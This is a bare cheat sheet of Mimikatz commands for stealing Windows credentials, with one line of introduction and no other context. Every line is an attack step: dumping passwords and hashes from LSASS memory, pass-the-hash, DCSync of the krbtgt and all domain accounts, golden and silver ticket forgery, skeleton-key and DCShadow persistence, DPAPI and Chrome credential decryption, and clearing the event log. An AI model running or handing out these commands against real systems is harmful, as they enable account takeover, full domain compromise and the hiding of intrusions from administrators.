Mimikatz extracts plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.
privilege::debug
token::elevate
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::pth /user:admin /domain:corp /ntlm:HASH /run:cmd.exe
sekurlsa::tickets
sekurlsa::tickets /export
sekurlsa::ekeys
sekurlsa::dpapi
sekurlsa::msv
sekurlsa::credman
sekurlsa::ssp
lsadump::sam
lsadump::lsa /patch
lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /all /csv
lsadump::cache
lsadump::secrets
lsadump::dcsync /domain:corp.local /user:krbtgt
lsadump::trust /patch
lsadump::backupkeys /system:dc01.corp.local /export
lsadump::dcshadow /object:victim /attribute:sidHistory /value:S-1-5-21-XXXX-519
kerberos::list /export
kerberos::ptt ticket.kirbi
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ticket:golden.kirbi
kerberos::silver /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server /service:cifs /rc4:HASH /ticket:silver.kirbi
kerberos::purge
invoke-mimikatz -DumpCreds
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
procdump.exe -ma lsass.exe lsass.dmp
mimikatz "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\SID\mkfile" /sid:S-1-5-21-XXXX /password:Passw0rd
dpapi::masterkey /in:mkfile /rpc
dpapi::cred /in:credfile
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"
vault::cred /patch
vault::list
misc::skeleton
lsadump::setntlm /user:victim /server:dc01.corp.local /ntlm:NEWHASH
crypto::capi && crypto::certificates /export /systemstore:LOCAL_MACHINE
misc::addsid victim S-1-5-21-XXXX-519
event::drop